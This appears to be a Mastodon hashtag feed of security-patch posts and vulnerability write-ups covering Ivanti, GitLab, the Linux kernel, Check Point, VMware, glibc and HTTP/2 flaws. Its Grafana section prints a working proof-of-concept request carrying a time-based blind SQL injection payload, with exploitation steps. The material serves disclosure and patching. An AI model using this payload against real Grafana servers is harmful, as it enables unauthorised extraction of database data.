Lmst

Na dann wolln wir mal...
Auf dass das Tröten mit euch noch besser funzt!
#SecurityPatch

Ivanti's latest patch locks down a vulnerability that let hackers sneak in like uninvited guests. Are your systems still at risk? Discover how these zero-day fixes could be your digital lifesaver.

https://thedefendopsdiaries.com/ivantis-security-patch-addressing-critical-vulnerabilities-in-epmm/

#ivanti
#zeroday
#cybersecurity
#securitypatch
#epmm

Fortinet just pulled off a rapid counterattack against a dangerous zero-day exploit in their FortiVoice systems. How did they turn a potential crisis into a showcase of quick, effective cybersecurity? Read on to find out.

https://thedefendopsdiaries.com/fortinets-swift-response-to-zero-day-exploits-in-fortivoice-systems/

#fortinet
#zeroday
#cybersecurity
#infosec
#securitypatch

Still running older macOS Ventura/Sonoma or iPadOS 17? Apple's got you covered with fresh security updates (May 12). Patches vulnerabilities, no known active exploits. Grab 'em via System Settings. #AppleUpdates #SecurityPatch #Tech

Secure Your Older Mac and iPad with Apple's Latest Updates.

Researchers warn a Next.js flaw, present for years, could've allowed hackers to bypass middleware-based authentication. Vercel patched it on March 18. #Nextjs #Cybersecurity #Vercel #TechNews #DataBreach #Authentication #SecurityPatch #Hacking

Apple has released iOS 18.3.2 & iPadOS 18.3.2 to fix a zero-day vulnerability (CVE-2025-24201) in WebKit, which was exploited in targeted iPhone attacks. Update your devices now! 📱💻 More info: https://cyberinsider.com/apple-patches-zero-day-flaw-used-in-targeted-iphone-attacks/ #Apple #iOS #SecurityPatch #ZeroDay #oldnewz

The Joomla! Project announces the release of Joomla 5.2.2. This is a security and bug fix release for the 5.x series of Joomla.
Read about all the updates and bug fixes here:
https://www.joomla.org/announcements/release-news/5918-joomla-5-2-2-security-bugfix-release.html
#Joomla #CMS #SecurityPatch #OpenSource

Windows 10 was first released to the public on July 29th, 2015, when it had addressed the raging complaints about the mishaps of Windows 8 and 8.1. It simplified the user experience and made your workflow easier than before. Since then, updates to this version of Windows had been made to bring new features, to conduct performance improvements, and to make the operating system easier to use. Back then, Microsoft had promised in a conference that Windows 10 was going to be the last Windows version ever, and that there would be no Windows 11 or later.

When we’ve witnessed Windows 11 being released on October 5th, 2021, we realized that Windows 10 wasn’t the last version of Windows. Since then, the last update to Windows 10, 22H2, was released on October 18th, 2022, more than a year after the initial version of Windows 11 was out.

Today, we are reminding users that the end of support date for Windows 10 will be on October 14th, 2025. This means that you’ll no longer get the following:

Security updates
Bug fixes
New features

If you’re still running Windows 10 and your computer meets the minimum requirements for Windows 11, upgrade it now to keep getting security updates! Attempting to install Windows 11 on unsupported computers won’t work as Microsoft is trying to block workarounds, and even if it’s successful, you won’t get any updates.

In addition to that, future applications may not support Windows 10 anymore. Hence, you won’t get any updates for them, too.

Stay safe!

https://officialaptivi.wordpress.com/2024/09/13/windows-10-nears-end-of-support/

#2015 #BugFixes #cybersecurity #EndOfLife #EOL #microsoft #news #OutOfSupport #Patches #security #SecurityPatch #SecurityUpdate #SecurityUpdates #update #Updates #Windows #Windows10 #Windows11

Citrix patches critical NetScaler Console vulnerability

(improper auth: 9.4/10 on CVSS)

https://stackdiary.com/citrix-patches-critical-netscaler-console-vulnerability/

#Citrix #NetScaler #Security #Patch #Update #Vulnerability #Critical #Console #Fix #Cybersecurity #Protection #Software #Network #Tech #IT #SecurityUpdate #BugFix #Safety #Defense #Infrastructure #TechNews #SecurityPatch #CyberDefense #TechUpdate #SecurityAlert #Threat #Secure #Risk #ITSecurity #TechSafety #SystemUpdate #CVE

#AfterSpace Update auf Mastodon 4.2.10 erfolgreich durchgeführt.

Bitte weiter tooten <3 :mastodon: #MastoAdmin #critical #SecurityUpdate #SecurityPatch

GitLab Critical Security Patch Release: 17.1.1

Date: June 26, 2024
CVE: CVE-2024-5655
Vulnerability Type: Improper Authorization
CWE: [[CWE-284]], [[CWE-79]], [[CWE-352]]
Sources: GitLab Patch Release

Synopsis

GitLab released a critical security patch (versions 17.1.1, 17.0.3, and 16.11.5) to address several vulnerabilities, including a critical issue that allows attackers to run pipelines as any user.

Issue Summary

The latest GitLab patch addresses critical and high-severity vulnerabilities that could allow attackers to exploit the system, such as running pipelines as any user and injecting stored XSS in commit notes. These vulnerabilities affect versions from 15.8 to 17.1.0.

CVE-2024-5655 - CRITICAL
An issue was discovered in GitLab CEEE affecting all versions starting from 15.8 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows an attacker to trigger a pipeline as another user under certain circumstances.

CVE-2024-6323 - High
Improper authorization in global search in GitLab EE affecting all versions from 16.11 prior to 16.11.5 and 17.0 prior to 17.0.3 and 17.1 prior to 17.1.1 allows an attacker leak content of a private repository in a public project.

CVE-2024-4901 - High
An issue was discovered in GitLab CEEE affecting all versions starting from 16.9 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, where a stored XSS vulnerability could be imported from a project with malicious commit notes.

CVE-2024-1816 - Medium
An issue was discovered in GitLab CEEE affecting all versions starting from 12.0 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows for an attacker to cause a denial of service using a crafted OpenAPI file.

CVE-2024-2191 - Medium
An issue was discovered in GitLab CEEE affecting all versions starting from 16.9 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows merge request title to be visible publicly despite being set as project members only.

CVE-2024-3959 - Medium
An issue was discovered in GitLab CEEE affecting all versions starting from 16.7 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows private job artifacts can be accessed by any user.

CVE-2024-4557 - Medium
Multiple Denial of Service DoS conditions has been discovered in GitLab CEEE affecting all versions starting from 1.0 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1 which allowed an attacker to cause resource exhaustion via banzai pipeline.

CVE-2024-5430 - Medium
An issue was discovered in GitLab CEEE affecting all versions starting from 16.10 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows a project maintainer can delete the merge request approval policy via graphQL.

CVE-2024-4011 - Low
An issue was discovered in GitLab CEEE affecting all versions starting from 16.1 prior to 16.11.5, starting from 17.0 prior to 17.0.3, and starting from 17.1 prior to 17.1.1, which allows nonproject member to promote key results to objectives.

Technical Key Findings

Run pipelines as any user: A critical vulnerability (CVSS 9.6) enabling attackers to trigger pipelines under another user's identity.
Stored XSS in commit notes: High severity vulnerability (CVSS 8.7) allowing XSS injection through imported project commit notes.
CSRF on GraphQL API: High severity issue (CVSS 8.1) permitting unauthorized GraphQL mutations via CSRF attacks.

Vulnerable Products

GitLab CE/EE versions from 15.8 to 16.11.4, 17.0 to 17.0.2, and 17.1 to 17.1.0.

Impact Assessment

Exploiting these vulnerabilities can lead to unauthorized code execution, sensitive data exposure, and potential takeover of GitLab instances.

Run pipelines as any user: This vulnerability enables attackers to execute code and perform actions on behalf of other users without authorization. It bypasses standard access controls, allowing malicious actors to manipulate the CI/CD pipeline as if they were legitimate users. This could lead to unauthorized changes in the codebase, deployment of malicious software, or alteration of critical infrastructure configurations.
Stored XSS in commit notes: Stored XSS vulnerabilities persist in the application until explicitly removed, with malicious scripts injected into commit notes that can affect every user viewing these notes. The wide attack surface includes multiple users such as developers and project managers, increasing the risk as each view can trigger the malicious script.
CSRF on GraphQL API: This vulnerability is easy to exploit and has a wide-ranging impact on system confidentiality and integrity, affecting multiple users and components due to the extensive use of GraphQL APIs in GitLab.## Patches or WorkaroundImmediate upgrade to the patched versions 17.1.1, 17.0.3, or 16.11.5 is strongly recommended. Details on upgrading can be found on the GitLab update page.

Tags

#GitLab #CVE-2024-5655 #CWE-284 #CWE-79 #CWE-352 #SecurityPatch #Vulnerability #DevOps #CI/CD

PoC released for Critical Privilege Escalation Vulnerability in Linux Kernel

Date: June 5, 2024

CVE: CVE-2023-3390

Vulnerability Type: Use-After-Free

CWE: [[CWE-416]]

Sources: SSD-disclosure NVD, Debian Security Tracker, Snyk

Synopsis

A PoC Exploit has been released for Linux Kernel use-after-free vulnerability, identified as CVE-2023-3390, has been discovered in the Linux kernel's netfilter subsystem. This flaw, present in the nf_tables_api.c file, can allow a local attacker with the ability to execute low-privileged code on the target system to escalate privileges due to mishandled error handling. The vulnerability has been patched.

Issue Summary

CVE-2023-3390 is a critical vulnerability found in the Linux kernel's netfilter subsystem. The issue arises from a use-after-free error in the NFT_MSG_NEWRULE handling, potentially allowing attackers to exploit a dangling pointer within the same transaction. This flaw enables local attackers to gain elevated privileges on affected systems.

Technical Key Findings

The root cause of CVE-2023-3390, a critical privilege escalation vulnerability in the Linux kernel, lies in the improper management of integer values within the nft_parse_register_store function of the Netfilter subsystem. Specifically, this vulnerability is due to an integer overflow issue within the nft_validate_register_store function, which fails to correctly handle certain large values for register indices.

The CVE-2023-3390 vulnerability arises from an integer overflow in the validation logic of the Netfilter subsystem, which fails to properly handle large register values, allowing an attacker to perform out-of-bounds writes to kernel memory. This leads to potential privilege escalation, compromising the affected system. It is crucial to apply patches that correct this validation flaw to mitigate the risk.

For details, see the detailed root cause analysis at SSD Secure Disclosure

Vulnerable Products

The vulnerability affects Debian 11 (Linux Kernel 5.10)

Impact Assessment

Exploiting this vulnerability allows a local attacker to gain root access, which can lead to severe consequences such as system compromise, data breaches, and service disruptions.

Patches or Workaround

Patches for CVE-2023-3390 have been released. Administrators are advised to update their Linux kernel to versions that include the commit 1240eb93f0616b21c675416516ff3d74798fdc97. an updated kernel in July 2023: https://tracker.debian.org/news/1449040/accepted-linux-510179-3-source-into-oldstable-security

Tags

#CVE-2023-3390 #LinuxKernel #PrivilegeEscalation #UseAfterFree #Netfilter #SecurityPatch #Debian #AlmaLinux #Ubuntu2404

Check Point Vulnerability Report: CVE-2024-24919

Date: May 29, 2024

CVE: CVE-2024-24919

Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor

CWE: [[CWE-22]], [[CWE-425]]

Sources: Check Point, [Tenable](CVE-2024-24919 | Tenable®) Tenable Blog

Synopsis

A critical vulnerability (CVE-2024-24919) has been identified in Check Point's CloudGuard Network Security appliance, allowing unauthorized actors to access sensitive information.

Issue Summary

The vulnerability, categorized as an 'Exposure of Sensitive Information to an Unauthorized Actor,' affects Check Point's CloudGuard Network Security appliances. Attackers can exploit this vulnerability to read sensitive information from gateways connected to the Internet and enabled with Remote Access VPN or Mobile Access. The flaw is actively exploited in the wild, making it a high-priority issue for administrators.

Technical Key Findings

The vulnerability arises from a path traversal issue in the appliance's handling of certain HTTP requests. Attackers can manipulate the request paths to access files on the device, bypassing standard access controls. The exploit involves sending crafted HTTP requests to the vulnerable endpoint, allowing unauthorized file reads.

Vulnerable Products

Check Point CloudGuard Network Security appliances with Remote Access VPN or Mobile Access enabled.

Impact Assessment

Exploiting this vulnerability can lead to unauthorized access to sensitive information, such as configuration files and password hashes. This could potentially escalate to full system compromise if critical files are accessed and misused.

Patches or Workaround

Check Point has released a hotfix to address this vulnerability. Administrators are urged to apply the patch immediately. The company also recommends placing the vulnerable gateway behind another security gateway with IPS and SSL inspection enabled as a temporary mitigation.

Tags

#CheckPoint #CVE-2024-24919 #InformationDisclosure #PathTraversal #NetworkSecurity #CloudGuard #SecurityPatch #VulnerabilityManagement #threatintelligence

VMware Patches Severe Security Flaws in Workstation and Fusion Products

Date: May 2024
CVE: CVE-2024-22267, CVE-2024-22268, CVE-2024-22269, CVE-2024-22270
Vulnerability Type: Use-After-Free, Heap Buffer Overflow, Information Disclosure
CWE: [[CWE-416]], [[CWE-122]], [[CWE-200]]
Sources: The Hacker News, Broadcom advisory

Issue Summary

Multiple severe security vulnerabilities have been identified in VMware Workstation and Fusion products. These vulnerabilities could potentially allow threat actors to execute arbitrary code, access sensitive information, and trigger denial-of-service (DoS) conditions. The affected versions include Workstation 17.x and Fusion 13.x.

Technical Key Findings

The vulnerabilities include a use-after-free issue in the Bluetooth device (CVE-2024-22267), a heap buffer overflow in the shader functionality (CVE-2024-22268), and two information disclosure flaws (CVE-2024-22269 and CVE-2024-22270). Exploiting these vulnerabilities requires local administrative privileges on a virtual machine, potentially allowing attackers to manipulate the VM's VMX process.

CVE-2024-22267 (CVSS score: 9.3) - A use-after-free vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Any|CVE-2024-22267|9.3|Critical|17.5.2|KB91760|None|
|Fusion|13.x|OS X|CVE-2024-22267|9.3|Critical|13.5.2|KB91760|None|

CVE-2024-22268 (CVSS score: 7.1) - A heap buffer-overflow vulnerability in the Shader functionality that could be exploited by a malicious actor with non-administrative access to a virtual machine with 3D graphics enabled to create a DoS condition

| VMware Product | Version | Running On | CVE | CVSSv3 | Severity | Fixed Version | Workarounds | Additional Documentation |
| -------------- | ------- | ---------- | -------------- | --------------------------------------------------------------------------------------------- | --------- | ------------- | ------------------------------------------------ | ------------------------ |
| Workstation | 17.x | Windows | CVE-2024-22268 | 7.1 | Important | 17.5.2 | KB59146 | None |
| Fusion | 13.x | OS X | CVE-2024-22268 | 7.1 | Important | 13.5.2 | KB59146 | None |

CVE-2024-22269 (CVSS score: 7.1) - An information disclosure vulnerability in the Bluetooth device that could be exploited by a malicious actor with local administrative privileges on a virtual machine== to read privileged information contained in hypervisor memory== from a virtual machine

|VMware Product|Version|Running On|CVE|CVSSv3|Severity|Fixed Version|Workarounds|Additional Documentation|
|---|---|---|---|---|---|---|---|---|
|Workstation|17.x|Any|CVE-2024-22269|7.1|Important|17.5.2|KB91760|None|
|Fusion|13.x|OS X|CVE-2024-22269|7.1|Important|13.5.2|KB91760|None|

CVE-2024-22270 (CVSS score: 7.1) - An information disclosure vulnerability in the Host Guest File Sharing (HGFS) functionality that could be exploited by a malicious actor with local administrative privileges on a virtual machine to read privileged information contained in hypervisor memory from a virtual machine

| VMware Product | Version | Running On | CVE | CVSSv3 | Severity | Fixed Version | Workarounds | Additional Documentation |
| -------------- | ------- | ---------- | -------------- | --------------------------------------------------------------------------------------------- | --------- | ------------- | ----------- | ------------------------ |
| Workstation | 17.x | Any | CVE-2024-22270 | 7.1 | Important | 17.5.2 | None | None |
| Fusion | 13.x | OS X | CVE-2024-22270 | 7.1 | Important | 13.5.2 | None | None |

Vulnerable Products

VMware Workstation versions 17.x
VMware Fusion versions 13.x

Impact Assessment

Exploiting these vulnerabilities could lead to significant security breaches, including arbitrary code execution on the host machine, sensitive data exposure, and system crashes. The critical nature of these flaws underscores the need for immediate remediation to prevent potential attacks.

Patches or Workarounds

VMware has released patches for these vulnerabilities in versions 17.5.2 (Workstation) and 13.5.2 (Fusion). As temporary measures, users are advised to disable Bluetooth support and 3D acceleration features on virtual machines. However, there is no workaround for CVE-2024-22270.

Tags

#VMware #CVE-2024-22267 #CVE-2024-22268 #CVE-2024-22269 #CVE-2024-22270 #UseAfterFree #HeapBufferOverflow #InformationDisclosure #Virtualization #Workstation #Fusion #SecurityPatch

Grafana SQL Injection Vulnerability Analysis

Date: 22nd March 2024
CVE: N.A.
Vulnerability Type: SQL Injection
CWE: [[CWE-89]]
Sources: FDlucifer GitHub , GBhackers

Issue Summary

A SQL injection vulnerability has been identified in Grafana, an open-source platform for monitoring and observability. This vulnerability allows authenticated users to execute arbitrary SQL commands through the Grafana SQL package, affecting all versions of the software. To exploit this sql injection vulnerability, someone must use a valid account (for example Read-Only) login to the Grafana web backend, then send malicious POST request to /api/ds/query “rawSql” entry.

If attackers login to the Grafana web backend, here they have the ability to interact with various APIs provided by Grafana, including the /api/ds/query API endpoint. This is used for making data queries within Grafana. They can use a post request to /api/ds/query api. This request includes the rawSql parameter, which allows direct input of SQL commands. Then they can modify the “rawSql” filed to execute (Malicious) sql strings that can lead to a time-based blind sql injection vulnerability, and then leak data from databases. Time-based blind SQL injection is a subtype of SQL injection where the attacker can determine if a part of the injected SQL statement is true based on how long it takes the application to respond. The SQL statements typically include commands that cause the database to wait for a specified amount of time (SLEEP, WAITFOR DELAY) before responding. This time delay allows the attacker to infer information about the database depending on whether the condition in the SQL query is true or false.

Example:
Running SQL query SELECT * FROM users WHERE username='admin' AND SLEEP(10) would let us know that there is a user present named 'admin' if the answer takes 10 seconds.

Technical Key Findings

The vulnerability originates in the SQL data source processing functions within Grafana's codebase, particularly in the SqlDatasource.ts and datasource.ts files. Attackers exploit this by sending specially crafted SQL queries via POST requests to the /api/ds/query endpoint.

grafana v8.0.4 poc:

POST /api/ds/query HTTP/1.1
Host: 172.16.32.57:3000
User-Agent: qzd_security_test_user_agent
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://172.16.32.57:3000/d/AEo5dM44k/pei-xun-xi-tong?orgId=1
content-type: application/json
x-grafana-org-id: 1
Content-Length: 142
Origin: http://172.16.32.57:3000
DNT: 1
Connection: close
Cookie: grafana_session=ede75844e20b0001a30e2c8522e5f1fc

{"queries":[{"refId":"A","format":"time_series","datasourceId":2,"rawSql":"(SELECT 8424 FROM (SELECT(SLEEP(2)))MKRN)","maxDataPoints":10000}]}

Then login to backend then click “Explore”, then use burp Capture POST /api/ds/query HTTP/1.1 packet, modify the “rawSql” entry to malicious sql strings, then we get a time-based sql injection.

![](https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/grafana3.png)## Vulnerable ProductsAll Grafana versions up to and including the latest release.

Impact Assessment

Successful exploitation could allow an attacker to manipulate or extract data from databases connected to Grafana, leading to potential data breaches and compromise of monitoring data integrity.

Patches or Workaround

The Grafana security team does not recognize this flaw as a vulnerability but rather as a feature of the backend system. This is disputed by the researcher leading him to publicly disclose the issue.

![](https://raw.githubusercontent.com/wiki/FDlucifer/FDlucifer.github.io/grafana8.png)

Tags

#Grafana #CVE-2023-3128 #SQLInjection #DataBreach #SecurityPatch

Buffer Overflow in GNU C Library Affects Older Versions

Date: April 17, 2024

CVE: CVE-2024-2961

Vulnerability Type: Out-of-bounds Write

CWE: [[CWE-787]]

Sources: SecurityVulnerability.io, NVD Mitigation blog

Issue Summary

A critical buffer overflow vulnerability has been identified in the GNU C Library's iconv function when converting charsets to certain Chinese Extended encodings. This flaw occurs when converting strings to the ISO-2022-CN-EXT character set in versions prior to 2.40, potentially leading to application crashes or memory corruption.

Technical Key Findings

The vulnerability stems from improper boundary checks during character set conversion, allowing up to 4 bytes of overflow. This could enable attackers to execute arbitrary code or disrupt program operation by manipulating memory locations adjacent to the buffer.

Vulnerable Products

All versions of GNU C Library older than 2.40 are susceptible. (That's potentially 24 years of a buffer overflow presence in the glibc!)

Impact Assessment

The vulnerability poses a high risk, potentially affecting the confidentiality, integrity, and availability of systems utilizing the affected library versions. There is no evidence of active exploitation yet, but the severity of potential impacts warrants prompt attention.

Patches or Workaround

The GNU C Library has released patches for this vulnerability. Users are advised to update to version 2.40 or later. If you are unable to (or it's not available on your OS yet), you can mitigate this issue by disabling the affected charsets in gconv.

Check if you are vulnerable

// The first line of the linker version info should include the version of glibc (either as GLIBC or GNU libc).

ldd --version

// Check if the vulnerable encodings are enabled in iconv:

iconv -l | grep -E 'CN-?EXT'

If they are, you will see an output like:

ISO-2022-CN-EXT//
ISO2022CNEXT//

Tags

#GNUCLibrary #CVE-2024-2961 #BufferOverflow #SecurityPatch #ISO2022CNEXT #CVE20242961 #iconv #iconvglibc

A significant security issue involving the Lighttpd web server was uncovered, affecting baseboard management controllers (BMCs) used in Intel and Lenovo devices. This vulnerability, a Heap Out-of-bounds read (CWE-125), was discovered in the Lighttpd module used in Intel Server System devices and Lenovo BMC firmware. The vulnerability was first discovered and fixed in August 2018, but due to the lack of a Common Vulnerabilities and Exposures (CVE) identifier and an advisory, it was overlooked by developers, including those of AMI MegaRAC BMC. This oversight resulted in the vulnerability persisting in products made by Intel and Lenovo.

The vulnerability allows an attacker to exfiltrate sensitive data, such as process memory addresses, which can then be used to bypass security mechanisms like Address Space Layout Randomization (ASLR).

The Binarly research team played a crucial role in identifying and documenting this vulnerability, assigning identifiers to the affected Intel and Lenovo BMC firmware and to vulnerable Lighttpd builds in general.

https://www.binarly.io/blog/lighttpd-gains-new-life

#cybersecurity #lighttpd #webserver #vulnerability #bmc #aslr #intel #lenovo #securitypatch #firmware #binarly

HTTP/2 CONTINUATION Flood Vulnerability Analysis

Date: April 3, 2024
CVE: N/A
Vulnerability Type: CWE-400 (Resource Exhaustion)
CWE: [[CWE-400]]
Sources: nowotarski.info

Issue Summary

The CONTINUATION Flood vulnerability exploits a flaw in [[HTTP2 protocol]] implementations, causing server resource exhaustion. Identified by Bartek Nowotarski, it demonstrates a significant threat as it allows attackers to disrupt server availability with minimal resources. Unlike traditional attacks, this method is not visible in HTTP access logs, complicating detection and mitigation efforts.

Technical Key findings

Attackers initiate an infinite stream of CONTINUATION frames without the END_HEADERS flag, leading servers to allocate excessive resources for processing, resulting in CPU exhaustion or memory depletion. This vulnerability has been observed across various HTTP/2 implementations, including major servers like [[Apache]] and [[Node.js]]. The flaw's severity is amplified by its low detection rate, as affected requests do not appear in access logs.

Vulnerable products

Affected projects and products include [[Apache httpd]], [[Envoy]], and various HTTP/2 libraries, particularly in languages like [[Golang]], [[Ruby]], and [[Node.js]]. The vulnerability spans across implementations, affecting a broad range of servers utilizing HTTP/2.

Impact assessment

The CONTINUATION Flood vulnerability can severely impact server performance and availability. In extreme cases, it can crash servers or lead to a complete denial of service with minimal attacker effort. Its undetectability in standard logging mechanisms further complicates mitigation, potentially allowing attackers to exploit this vulnerability without immediate detection.

Patches or workaround

As of the reporting date, specific patches or workarounds were not mentioned. However, standard mitigation strategies for similar vulnerabilities include updating affected software, limiting frame sizes, and employing timeouts for incomplete header frame sequences.

Tags

#HTTP/2, #DoS, #ResourceExhaustion, #ServerVulnerability, #SecurityPatch

#securitypatch

Client Info